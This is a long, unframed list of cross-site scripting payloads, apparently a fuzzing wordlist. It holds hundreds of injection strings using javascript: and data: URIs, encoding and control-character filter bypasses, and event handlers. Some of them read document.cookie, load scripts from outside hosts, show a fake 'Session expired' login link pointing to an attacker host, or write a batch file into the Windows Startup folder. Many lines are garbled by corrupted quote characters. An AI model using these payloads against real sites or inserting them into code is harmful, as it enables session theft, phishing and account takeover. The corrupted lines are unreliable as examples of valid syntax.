- aha <script src=>alert(/IE|Opera/)</script>
- <a href=````>
- a.href=’#’
- <a/href[\0C]=ja	vasc	ript:confirm(1)>XXX</a>
- <a href=[0x0b]” onclick=confirm(1)//”>click</a>
- <a href=[0x0b]renwax23" onfocus=prompt(1) autofocus fragment=”
- <a href=”javascript:alert(1)">Test</a>
- <a href=”javascript:confi 14m(1)">Clickhere</a>
- <a href=”javascript:confirm(1)">Clickhere</a>
- <a href=”javascript:alert(1)”>CLICK ME<a>
- <a href=”&#106&#97&#118&#97&& #35115&#99&#114&#105&# 912&#116&#58&#99&#111& #38#110&#102&#105&#114 8#109&#40&#49&#41">Clickhere</a>
- <a href=”&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>
- <a href=”about:<script>document.vulnerable=true;</script>”>
- <! — <A href=”- →<a href=javascript:alert:document.domain>test →
- <a href=”[a]java[b]script[c]:alert(1)”>XXX</a>
- <a href=����&/onclick=alert(9)>foo</a>
- ?a href=asfunction:System.Security.allowDomain,evilhost?
- <a href=”//ben.mario#%0Aalert(3);”>CLICKME</a>
- <a href=``calc``>
- <a href=”//???????”>click</a>
- <a href=”data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>click</a>?
- <a href=”data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>click</a>
- <a href=”data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”	 >X</a
- <a href=”data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==” >X</a
- <a/href=data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==>ClickMe</a>
- <a href=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==”><img src=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==”></a>
- <a href=”data:),< s c r i p t > a l e r t ( document.domain ) < / s c r i p t >”>CLICK</a>
- <a href=”data:text/html,%3cscript>confirm (1)</script>” >hello
- “><a href=”data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+”>click</a>
- <a href=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+>clickme
- <a href=��data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+��>ClickMe
- <a href=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+>ClickMe
- <a href=”data:text/html;base64,PHN2Zy?9vbmxv?YWQ<>>9YWxlc>>>nQoMSk”>click</a>
- <a href=”data:text/html;base64,PHN2Zye?L9vbmxva?EYWQ<>>9YWxlc>>>nQoMSk+”>click</a>
- <a href=��data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg��>foo</a>
- <a href=”data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=”>test</a>
- <a href=”data:text/html;base64,PHNjcmlwdD5hbGVydCgnMScpPC9zY3JpcHQ+ “>click<a>
- <a href=”data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4=”>Test</a>
- <a HREF=”data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==”>ugh</a>
- <a href=’data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==’>click<a>
- <a href=”data:text/html;base64_,<svg/onload=\u0061le%72t(1)>”>X</a
- <a href=”data:text/html;base64_,<svg/onload=\u0061le%72t(1)>”>X</a
- “/><a href=”data:text/html;base64_,<svg/onload=\u0061le%72t(1)>”>X</a
- <a href=”data:text/html;base64xoxoxox,<body/onload=alert(1)>”>click</a>
- <a href=”data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
- <a href=”data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
- <a href=��data:text/html;charset=utf-16,%ff%fe%3c%00s%00c%00r%00i%00p%00t%00%3e%00a%00l%00e%00r%00t%00(%009%00)%00<%00/%00s%00c%00r%00i%00p%00t%00>%00��>foo</a>
- <a href=”data:text/html,<script>eval(name)</script>” target=”alert(‘ @garethheyes @0x6D6172696F ‘)”>click</a>
- <a href=”data:text/html,<script>eval(name)</script>” target=”confirm(1)”>click</a>
- <a$href=”data:text/html,%style=””3cscript>confirm((1)</sstyle=””cript>” onerror=>hello
- <a href=”data:text/html,<script>alert(1)</script>”>Click<test>
- <a href=”data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==”>Click<test>
- <a href=``explorer.exe``>
- <a href=”feed:javascript:alert(1)”>click</a>
- <;A HREF=”;//google”;>;XSS<;/A>;
- <A HREF=”//google”>XSS</A>
- <;A HREF=”;http://0102.0146.0007.00000223/";>;XSS<;/A>;
- <A HREF=”http://0102.0146.0007.00000223/">XSS</A>
- <A HREF=”http://0300.0250.0000.0001>XSS</A>
- <;A HREF=”;http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>;
- <A HREF=”http://0x42.0x0000066.0x7.0x93/">XSS</A>
- <A HREF=”http://0xc0.0xa8.000.001>XSS</A>
- <;A HREF=”;http://1113982867/";>;XSS<;/A>;
- <A HREF=”http://1113982867/">XSS</A>
- <A HREF=”http://127.0.0.1/">XSS</A>
- <A HREF=”http://3232235521>XSS</A>
- <A HREF=”http://3w.org">XSS</A>
- <A HREF=”http://6	6.000146.0x7.147/">XSS</A>
- <A HREF=”htt p://6 6.000146.07.147/””>XSS</A>
- <A HREF=”http://6 6.000146.07.147/””>XSS</A>
- <A HREF=”h tt p://6 6.000146.0x7.147/”>XSS</A>
- <A HREF=”htt p://6 6.000146.0x7.147/”>XSS</A>
- <A HREF=”htt p://6 6.000146.0x7.147/”>XSS</A>
- <A HREF=”htt p://6 6.000146.0x7.147/”>XSS</A>
- <A HREF=”htt p://6 6.000146.0x7.147/”>XSS</A>
- <A HREF=”htt p://6 6.000146.0x7.147/”>XSS</A>
- <A HREF=http://66.102.7.147/>link</A>
- <;A HREF=”;http://66.102.7.147/";>;XSS<;/A>;
- <A HREF=”http://66.102.7.147/">XSS</A>
- <A HREF=”h tt p://6	6.000146.0x7.147/”>XSS</A>
- <A HREF=”htt p://6	6.000146.0x7.147/”>XSS</A>
- <A HREF=http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D>link</A>
- <;A HREF=”;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>;
- <A HREF=”http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
- <a href=http://foo.bar/#x=`y></a><img alt=”`><img src=x:x onerror=javascript:alert(1)></a>”>
- <a href=http://foo.bar/#x=`y></a><img alt=”`><img src=xx:x onerror=alert(1)></a>”>
- <;A HREF=”;http://google.com/";>;XSS<;/A>;
- <A HREF=”http://google.com/">XSS</A>
- <;A HREF=”;http://google:ha.ckers.org";>;XSS<;/A>;
- <A HREF=”http://google:ha.ckers.org">XSS</A>
- <;A HREF=”;http://ha.ckers.org@google";>;XSS<;/A>;
- <A HREF=”http://ha.ckers.org@google">XSS</A>
- <a href=”https://4294967298915183000">click</a>=>google
- <a href=https://attacker/>Session expired. Please login again.</a>
- <a href=”http://”/><script>alert(‘zombie’)</script>@www.grayhat.in/">hackers</a>
- <A href=http://www.gohttp://www.google.com/ogle.com/>link</A>;
- <A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
- <;A HREF=”;http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>;
- <A HREF=”http://www.gohttp://www.google.com/ogle.com/">XSS</A>
- <a href=http://www.google.com">Clickme</a>
- <a href=��http://www.google.com>Clickme</a>
- <a href=http://www.google.com>Clickme</a>
- <;A HREF=”;http://www.google.com./";>;XSS<;/A>;
- <A HREF=”http://www.google.com./">XSS</A>
- <a href=”http://www.xyydyt.com" style=”color:#143d70; simsun;” onclick=”alert(/a/);this.style.behavior=’url(#default#homepage)’;this.setHomePage(‘http://www.xyydyt.com'); return(false);”>asdasdsad</a>
- <A HREF=ht://www.google.com/>link</A>
- <;A HREF=”;h
tt	p://6&;#09;6.000146.0x7.147/”;>;XSS<;/A>;
- <a href=”// ID.ws”>CLICK
- <a href=����&<img&/onclick=alert(9)>foo</a>
- <a href=”invalid:1" id=x name=y>test</a>
- “/><a href=”invalid:2" id=x name=y>test</a>
- <a href=”javascript:window[‘confirm’](1)”>aa</a>
- <a href=”javascript:alert%252831337%2529">Hello</a>
- <a href=”j[785 bytes of ]avascript:alert(1);”>XSS</a>
- <a href=”j[785 bytes of (
	)]avascript:alert(1);”>XSS</a>
- <a href=”javAascript:javascript:alert(1)”>test1</a>
- <a href=”javaascript:javascript:alert(1)”>test1</a>
- <a href=”javascript:alert(‘xss’)”>link</a>
- <a href=javascript:alert(1)>XXX</a>
- <a href=javascript:javascript:alert(1)>XXX</a>
- <a+href=”javascript#alert(1);”>
- <a href=”javascrip:alert(document.cookie)”>
- <a href=”jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”>click me</a>
- <a href=”javascript://%0d(0===0&&1==1)%0c?alert(1):confirm(2)”>click</a>
- <a/href=”javascript: javascript:prompt(1)”><input type=”X”>
- <a href=”//javascript:99999999/1?/YOU_MUST_HIT_RETURN<svg onload=confirm(1)>/:0">Right click open in new tab</a>
- <a href=javascript:alert(1)>
- <a href=javascript:alert(163)>click
- <a href=javascript:alert(19)>M
- <a href=javascript:alert(1)>click
- <a href=javascript:alert(1)>click
- <a href=javascript:alert(1)>Clickme</a>
- <a href=”javascript:alert(1)-html”>click me</a>
- <a href=”javascript:alert(1)//html”>click me</a>
- <a href=”javascript:alert(1)”>Link</a>
- <a href=”javascript:alert(1)” onmouseover=alert(1)>INJECTX HOVER</a>
- <a href = “javas cript :ale rt(1)”>test
- <a href=javascript:alert%28 /xss/%29>clickme
- <a href=”javascript:alert(3)”>Link</a>
- <a href=”javascript:alert(72)%%0D3C! —
- <a href=”javascript:alert(9)”>atul t</a>
- <a href=javascript:alert(9) href href=�� href=����>foo</a>
- <a href=”javascript:alert(‘test’)”>link</a>
- <a href=”javascript:alert(‘xss’)”>
- <a href=”javascript#alert(‘XSS’);”>
- ><a href=javascript:alert(/Xss-By-Muhaddi/)Click Me</a>
- ><a href=javascript:alert(/Xss/)Click Me</a>
- ��><a href=javascript:alert(/Xss/)Click Me</a>
- <a href=”javascript:𝕒𝓁𝔢𝔯𝕥(1)”>CLICKME</a>
- <a href=��javascript:��>Clickme</a>
- <a href=javascript:>Clickme</a>
- <a href=”javascript:alert(1)”>click</a>
- <a href=”jAvAsCrIpT:alert(1)”>X</a>
- <a href=javascript:alert(document.cookie)>Click Here</a>
- <a href=”javascript:alert(document.domain)”>Click Here</a>
- <a href=”javascript:'<script src=//Ð.pw>⃒</script>⃒'”>CLICK</a>
- <a href=javascript:confirm(2)>M
- <a href=”jAvAsCrIpT:confirm(1)”>X</a>
- “><a href=javascript:confirm(document.cookie)>Click Here</a>
- “/><a href=javascript:confirm(document.cookie)>Click Here</a>
- <a href=javascript:confirm(document.cookie)>Click-XSS</a>
- “><a/href=javascript:co\u006efir\u006d("1")>clickme</a>
- <a href=”javascript:\u0061le%72t(1)”><button>
- “><a href=”javascript:\u0061le%72t(1)”><button>
- <A/HREF=”javascript:confirm(1)”>
- “><a href=”javascript:confirm%28 1%29">Clickme</a>
- “><a href=”javascript:co\u006efir\u006d%28 1%29">Clickme</a>
- <a href=”javascript:data:alert(1)”>click</a>
- <A HREF=”javascript:document.location=’http://www.google.com/’”>link</A>
- <;A HREF=”;javascript:document.location=';http://www.google.com/';";>;XSS<;/A>;
- <A HREF=”javascript:document.location=’http://www.google.com/'">XSS</A>
- <a href=”javascript#document.vulnerable=true;”>
- <a href=”javascript:document.write(‘spoof’); void(0);”>Middle-click me</a>
- “><a href=”JAVASCRIPT:%E2%80%A8alert`1`”>
- <a href=”javascript:’hello’” rel=”sidebar”>x</a>
- <a href=’javascript:http://@cc_on/confirm%28location%29'>click</a>
- <a href=”javascript:javascript:alert(1)”><event-source src=”data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A”>
- <a/href=”javascript: javascript:prompt(1)”><input type=”X”>
- <a href=javascript:…>me</a>
- “><a href=javascript:prompt(1)>Clickme</a>
- “><a href=javascript:prompt%28 1%29>Clickme</a>
- <a href=”javascript:void(0)”>click</a>
- <a href=”javascript:void(0)” onmouseover=
javascript:alert(1)
>X</a>
- <a href=”javascript:void(0)” onmouseover=
javascript:confirm(1)
>X</a>
- <a href=”javascript\x00:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javascript\x09:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javascript\x0A:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javascript\x0D:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=javascript&.x3A;alert&(x28;1&)x29;//=>
- <a href=javascript&.x3A;confirm&(x28;1&)x29;//=>clickme
- <a href=”javascript\x3A:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javascript\x3Ajavascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javascript:x=open(‘http://www.xiaonei.com/');setInterval (function(){try{x.frames[0].location={toString:function(){return%20’http://xssor.io/Project/poc/docshell.html';}}}catch(e){}},3000);void(1);">Test</a>
- <a href=javascript:/**/XYZ:alert(202)>Test_202</a>
- <a href=javascript:/*XYZ*/XYZ:javascript:alert(201)>Test_201</a>
- <a href=��javaScrRipt:alert(1)��>Clickme</a>
- <a href=javaScrRipt:alert(1)>Clickme</a>
- <a href=”javas	cri
pt:confirm(1)”>test</a>
- <a href=”javas\x00cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x01cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x02cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x03cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x04cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x05cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x06cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x07cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x08cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x09cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x0Acript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x0Bcript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x0Ccript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x0Dcript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a/href=java	script:confirm%28/XSS/%29>click</a>
- <a href=”j	a	v	asc
ri	pt:confirm(1)”>Click<test>
- <a href=”j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(1)”>Click<test>
- <a href=”j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(1)” >Click<test>
- <a/href=”j	a	v	asc	ri	pt:confirm(1)”>Click<test>
- <a href=”j&#x26#x41;vascript:alert%252831337%2529">Hello</a>
- <a href=”j&#x26#x41;vascript:alert%252831337%2529">Hello</a>
- a href=”j&#x26#x41;vascript:confirm%252831337%2529">Hello</a>
- <a href=”javascript:alert(-1)”
- <a <! — → href=”javascript:alert(-1)”>hello</a>
- <a <! — href=”javascript:alert(31337);”>Hello</a>
- <a href=``mspaint.exe``>
- <a href=``notepad.exe``>
- <a href=”#” onclick=”alert(1)”>s</a>
- <a href=”#” onclick=”alert(‘ ');alert(2 ‘)”>name</a>
- <a href= . ����\�� onclick=alert(9) ������>foo</a>
- <a href=”” onclick=``/*/alt=”*//alert(1)//”>clickme</a>
- <a href=”#” onclick=”confirm(‘ ');alert(2 ‘)”>name</a>
- <a href=”” onclick=``/name==alert(1)>clickme</a>
- <a href=”” onmousedown=”var name = ‘';alert(1)//’; alert(‘smthg’)”>Link</a>
- <a href=’#’ onmouseover =”javascript:$(‘a’).html(5)”>a link</a>
- <a href=[?]”? onmouseover=prompt(1)//”>XYZ</a
- <a href=”?q=javascript%3Aalert(31)”>Link</a>
- <a href=”rhainfosec.com” onclimbatree=alert(1)>ClickHere</a>
- <a href=”rhainfosec.com” onmouseover=alert(1)>ClickHere</a>
- <a href=``shell:System``>
- <a href=”//fi.org”>CLICKME</a>
- <a href=”//𝔾𝒪ℴℊℒⅇ.ℂ𝔬ℳ”>CLICKME</a>
- <a href target=_blank>click</a>
- <a href=//target rel=noreferer target=pkav>click</a>
- <a href=uhttp://www.google.com">Clickme</a>
- <a href=’vbscript:MsgBox(“XSS”)’>link</a>
- <a href=’vbscript:”\"&confirm(1)''"’>
- <a href=vjavascript:alert(1)v>Clickme</a>
- <a href=vUserinputv>Click</a>
- <a href=”\/www.google.com/favicon.ico">click</a>
- <;A HREF=”;//www.google.com/";>;XSS<;/A>;
- <A HREF=”//www.google.com/">XSS</A>
- <a href=”\x00javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x01javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x02javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x03javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x04javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x05javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x06javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x07javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x08javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x09javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x0Ajavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x0Bjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x0Cjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x0Djavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x0Ejavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x0Fjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x10javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x11javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x12javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x13javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x14javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x15javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x16javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x17javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x18javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x19javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x1Ajavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x1Bjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x1Cjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x1Djavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x1Ejavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x1Fjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x20javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=” javascript:alert(1)”>click</a>
- <a href=”\xC2\xA0javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”x:confirm(1)” id=”test”>click</a><script>eval(test+’’)</script>
- <a href=”\xE1\x9A\x80javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE1\xA0\x8Ejavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x80javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x81javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x82javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x83javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x84javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x85javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x86javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x87javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x88javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x89javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x8Ajavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\xA8javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\xA9javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\xAFjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x81\x9Fjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE3\x80\x80javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=``xss.cx``>
- <a href=”xss.php?a=<sc%0aript>alert(/1/)</script>”>
- <a href=?xss=<script>>link</a>
- <a href=��?xss=<script>��>link</a>
- <a href=”xxx# onclick=alert(1)//[255]”></a>
- <a href=”xxx# onclick=alert(1)//[64kb]”></a>
- ><a id=ahref=javascript:a\u006cer\u0074(/Xss-By-Muhaddi/) id=xss-test>Click me</a>#a <
- ��><a id=��a��href=javascript:a\u006cer\u0074(/Xss-By-Muhaddi/) id=��xss-test��>Click me</a>#a <
- ><a id=ahref=javascript:a\u006cer\u0074(/xss-by-shawar/) id=xss-test>Click me</a>#a <
- <a����id=a href=��onclick=alert(9)>foo</a>
- a id=CLOSURE_BASE_PATHhref=http://attacker/xss /a
- <a id=�� href=����>��href=javascript:alert(9)>foo</a>
- <a id=��href=http://web.site/��onclick=alert(9)>foo</a>
- <a id=��http://web.site/��onclick=alert(9)<!�Vhref=a>foo</a>�V>
- <a id=”x” href=’http://adspecs.yahoo.com/adspecs.php' target=”close(/*grabcookie(1)*/)”>CLICK</a><script>onblur=function(){confirm(4)}x.click();</script>
- <a id=”x”><rect fill=”white” width=”1000" height=”1000"/></a>
- <a id=XSS href=”about:<script>alert(‘XSS’);</script>”>
- a(){};if(true){/*/alert();a=`,x={//
- a(){};if(true){/*/alert();a=`,x={//”’<>\r\n\ being escaped
- aim: &c:\windows\system32\calc.exe” ini=”C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat”
- “/></a></><img src=1.gif onerror=alert(1)>
- <A “””><IMG SRC=”javascript:confirm(1)”>
- a?><img src= onerror=confirm(1)>
- .ajax
- a.jsp/<script>alert(‘Vulnerable’)</script>
- <a language=vbs onclick=’addUser(\”11\\\”&alert(1)\\\”\”)’>add</a>
- [_`${_=`ale`}`]
- ‘ale’%2B’rt’%2Blocation.hash.substr(1)>#(1)
- ale%2Brt%2Blocation.hash.substr(1)>#(1)
- alert``
- A+L+E+R+T;
- +alert(0)+
- ‘;alert(0)//\’;alert(1)//”;alert(2)//\”;alert(3)// →</SCRIPT>”>’><SCRIPT>alert(4)</SCRIPT>=&{}”);}alert(6);function xss(){//
- ‘;alert(0)//\’;alert(1)//”;alert(2)//\”;alert(3)// →</SCRIPT>”>’></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}”);}
- alert(+’???0O2471???’)
- ‘;alert(0x000123)’
- ‘+alert(0x000123)+’
- \”; alert(0x000123)
- `${alert(1)/*}`*/}`
- `$alert(1)}`
- */alert(1)/*
- ; alert(1);
- ?alert(1)”,
- ‘|alert(1)|’
- ‘-alert(1)-’
- ‘-alert(1)//
- ‘}};alert(1);{{‘
- ‘}alert(1);{‘
- “-alert(1)-”
- “‘-alert(1)-’”
- “}]}’;alert(1);{{‘
- ({‘ \’(){alert(1)}})[` \`]()
- (alert)(1)
- )alert(1);//
- […`${alert(1)}`]
- ${alert`1`}`
- */alert(1)/*
- \;alert(1)//
- \’-alert(1)//
- \’-alert(1)};{//
- \’}alert(1);{//
- \”;alert(1);//
- \\;alert(1)//
- \\��;alert(1)//
- \��;alert(1)//
- #*/alert(1)
- alert`1`
- alert(1,)//
- alert(1){}{}{}{}
- alert(1){}
- alert(1)
- ‘}alert(1)%0A{‘
- ;alert(123);
- ‘;alert(123);t=’
- “;alert(123);t=”
- ‘>alert(154)</script><script/154=’
- */alert(155)</script><script>/*
- */alert(156)”>’onload=”/*<svg/156=’
- `-alert(158)”>’onload=”`<svg/158=’
- <alert(192)<! — onmouseover=location=innerHTML+outerHTML>javascript:192/*00000*/
- “”});});});alert(1);$(‘a’).each(function(i){$(this).click(function(event){x({y
- <{alert(1)}></{alert(2)}>.(alert(3)).@wtf.(wtf)
- alert(1) /alert`2`/i
- “])},alert(1));(function xss() {//
- alert(1)>//INJECTX
- “alert(1)” instanceof [];
- -alert(1)<javascript: onclick=location=tagName%2bpreviousSibling.nodeValue>click me!
- “-alert(1)<javascript:” onclick=location=tagName%2bpreviousSibling.nodeValue>click me!
- -alert(1)<javas onclick=location=tagName%2binnerHTML%2bpreviousSibling.nodeValue>cript:click me!
- “-alert(1)<javas onclick=location=tagName%2binnerHTML%2bpreviousSibling.nodeValue>cript:”click me!
- alert(1)(‘lol’,’lol’)(‘lol’,’lol’)(‘lol’,’lol’)(‘lol’,’lol’).x.y.LOL()
- <alert(1)<! — onclick=location=innerHTML+outerHTML>javascript:1/*click me!*/</alert(1)<! — →
- `-alert(1)”>’onload=”`<svg/1=’
- */alert(1)”>’onload=”/*<svg/1=’
- ‘alert(1)’.replace(/.+/,eval)
- “alert(1)”.replace(/./g,function(c){return String.fromCharCode(parseInt(‘26’+c.charCodeAt(0).toString(16),16))})
- */alert(1)</script><script>/*
- ‘>alert(1)</script><script/1=’
- ‘>alert(1)</script><script/1=’
- alert(1)-/><script>///</textarea>
- alert(1)// →</svg><script>0</script>
- -alert(1)-<svg><!V
- ‘-alert(1)-’<svg><!V
- <alert(1)<!V onclick=location=innerHTML%2bouterHTML>javascript:1/*click me!*/</alert(1)<!V>
- “};alert(23);a={“a”:
- /alert`2`/i
- “>*/alert(35)</script><script>/*<kukux//
- alert(1)
- <alert(40)<! — onmouseover=location=innerHTML%2bouterHTML>javascript:1/*00000*/
- `-alert(5)</script><script>`
- “`-alert(67)</script><script>`
- ‘-alert(79)-’
- ‘-alert(80)//
- \’-alert(81)//
- (alert)(82)
- alert(9)��>foo</a>
- -alert(9)<javascript:” onclick=location=tagName+previousSibling.nodeValue>click me!
- ‘-alert(9)<javas onclick=location=tagName+innerHTML+previousSibling.nodeValue>cript:’click me!
- alert(a.source)</SCRIPT>
- alert = a\u006cer\u0074
- Alert = a\u006cer\u0074
- alert.call(this, document.cookie)
- alert(doc.domain); // The same domain as the top page
- alert(document[“cook” + ([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]])
- alert(document.cookie)
- alert(document[‘cookie’])
- ; alert(document.cookie); var foo=
- ��; alert(document.cookie); var foo=��
- ‘);alert(‘done’);var b=(‘
- alert(/foo bar/.source)
- “;alert(“I am coming again~”);”
- }alert(/INJECTX/);{//
- alert(‘Latitude:’+p.coords.latitude+’,Longitude:’+
- alert(1)
- alert;pg(“XSS”)
- ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//\\”;alert(String.fromCharCode(88,83,83))// — ></SCRIPT>\”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- //”;alert(String.fromCharCode(88,83,83))
- ‘;alert(String.fromCharCode(88,83,83))//
